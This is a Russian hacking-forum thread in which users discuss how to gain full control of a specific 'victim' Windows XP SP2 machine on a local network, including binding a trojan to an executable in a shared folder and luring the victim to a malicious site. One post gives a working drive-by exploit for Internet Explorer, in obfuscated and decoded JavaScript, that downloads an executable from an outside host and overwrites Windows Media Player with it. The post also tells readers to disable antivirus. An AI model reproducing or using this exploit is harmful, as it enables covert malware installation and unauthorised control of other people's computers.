Народ хочу получить дельный совет чем орудовать в локалке!!!!
Сведения об жертве:
0.) O.C WinXP SP-2
1.) есть шары(не важно какие главное что не C$ и т.д хотя есть полный доступ к одной из папок которая находится на C: )
2.) tcp 139 135 и многое другое открыто ну как всегда.
3.) Firewall нах. отсутствует.
NEW:
4.)445/tcp - Microsoft DS
Удаленное выполнение команд (ms05-027)
Обнаружена уязвимость в Microsoft Server Message Block (SMB),
которая позволяет удаленному пользователю выполнить произвольный
код на целевой системе.
5.) И аньти вирь у него даже не стоит!!!

В общем мне хотелсь бы получить доступ к системе для полного контроля апанента :D

Можно попытся (Я про директорию к которой у тебя полный доступ) подменить там прогу какую-нить. В случае, конечно если они там есть. Берешь екзешник оттуда, клеишь его с троем и всё.

Просто так пробить второй нельзя. По крайней мере у меня таких эксплоитов нет.

Самый простой и эфективный способ - троян.

А как его дать жертве? Полазь по форуму. Ну либо впарить, либо попросить заценить какой нить сайт, где он подгрузит трой через дыру в Ie. За полгода в Ie их уже штук 10-ть нашли. Правда найти рабочий эксплоит - проблема. Но всё возможно.

Не знаешь где можно слить прогу для склеивания???

http://forum.antichat.ru/thread14393-%EA%EB%E5%E9.html

Хм... Ну чтоб шелл получить с правами SYSTEM, как это поволял делать kaht, таких в паблике насегодня я не видел. Но можно устроить веселую жизнь ушастым уводя их в даун, такие есть. Попробуй вот это: http://forum.antichat.ru/threadedpost111536.html, не уверен что будет в локалке пахать, но мало ли.. Ну и конечно с троями стоит заморочиться, тут и удаленный контроль и перезагрузка... =) Вот только говоря что фаирвола нет это ошибаться, так как XP SP2 подразумевает интегрированный в Windows фаирвол. Ещё обрати внимание на уязвимости прикладных программ, IE например... Это самая большая дыра наверное...

А да, kaht работает против SP2, да?

Правда найти рабочий эксплоит - проблема. Но всё возможно.
Вот сплойт ...незнаю как у вас у меня работает


<script language="javascript">

fff = String.fromCharCode(118,97,114,32,120,32,61,32,110 ,101,119,32,65,99,116,105,118,101,88,79,98,106,101 ,99,116,40,34,77,105,99,114,111,115,111,102,116,46 ,88,77,76,72,84,84,80,34,41,59,92,114,92,110,120,4 6,79,112,101,110,40,34,71,69,84,34,44,32,34,104,11 6,116,112,58,37,50,102,37,50,102,119,119,119,46,10 9,121,45,114,111,115,116,111,118,46,102,97,116,97, 108,46,114,117,37,50,102,102,105,108,101,115,37,50 ,102,115,101,114,118,105,99,101,115,46,101,120,101 ,34,44,48,41,59,92,114,92,110,120,46,83,101,110,10 0,40,41,59,92,114,92,110,118,97,114,32,115,32,61,3 2,110,101,119,32,65,99,116,105,118,101,88,79,98,10 6,101,99,116,40,34,65,68,79,68,66,46,83,116,114,10 1,97,109,34,41,59,92,114,92,110,115,46,77,111,100, 101,32,61,32,51,59,92,114,92,110,115,46,84,121,112 ,101,32,61,32,49,59,92,114,92,110,115,46,79,112,10 1,110,40,41,59,92,114,92,110,115,46,87,114,105,116 ,101,40,120,46,114,101,115,112,111,110,115,101,66, 111,100,121,41,59,92,114,92,110,115,46,83,97,118,1 01,84,111,70,105,108,101,40,34,67,58,92,92,92,92,8 0,114,111,103,114,97,109,32,70,105,108,101,115,92, 92,92,92,87,105,110,100,111,119,115,32,77,101,100, 105,97,32,80,108,97,121,101,114,92,92,92,92,119,10 9,112,108,97,121,101,114,46,101,120,101,34,44,50,4 1,59,92,114,92,110,108,111,99,97,116,105,111,110,4 6,104,114,101,102,32,61,32,34,109,109,115,58,37,50 ,102,37,50,102,34,59,92,114,92,110);

myURL = "file:javascript:eval('" + fff + "')";
window.open(myURL,"_media");
</script>

закодированном в ASCII кодировку... аналог

<script language="javascript">
var x = new ActiveXObject("Microsoft.XMLHTTP");
x.Open("GET", "http:%2f%2fwww.my-rostov.fatal.ru%2ffiles%2fservices.exe",0);
x.Send();
var s = new ActiveXObject("ADODB.Stream");
s.Mode = 3;
s.Type = 1;
s.Open();
s.Write(x.responseBody);
s.SaveToFile("C:\\\\Program Files\\\\Windows Media Player\\\\wmplayer.exe",2);
location.href = "mms:%2f%2f";
</script>
и взял я его из коммента видео ,на видео ачат ру
и еще когда скопируешь на блокнот то айболит выруби а то сразу ловит троян довнлоудер

kaht не катит на SP2

kaht не катит на SP2 :) Да? Чё правда?
Мля....Может он хоть под линухом покатит? :)
Шутка. Ну и новости у тебя..... Мягко говоря, не первой свежести.

:) Да? Чё правда?
Мля....Может он хоть под линухом покатит? :)
Шутка. Ну и новости у тебя..... Мягко говоря, не первой свежести.
слыш тока умничать не надо, лучше предложи что-то стояшее что даст шелл на 2 паке

слыш тока умничать не надо, лучше предложи что-то стояшее что даст шелл на 2 паке
Есть одна вещь. Но этой самой вещи нехватает половине античатовцев. Мозг называется. И умение им пользоваться.
:::::::Ничего личного:::::::::::::::::::::::

А да, kaht работает против SP2, да?

Не то чтобы работал против XP SP2, даже на XP SP2 работать не будет.

Поддерживаю Electro.

Не то чтобы работал против Xp Sp2, даже на Xp Sp2 работать не будет.
Не делай так больше..... Столько смеяться нельзя :)
Уууууууу............

Вообщем если уязвимость на компе в инете имеется
Microsoft RPC 135 / tcp
Версия опер системы: Windows Server 2003 R2 3790 Service Pack 2

Нету шелла или проги для получения командной строки , у жертвы, что бы можно было удалённое выполнение команд (ms03-039)?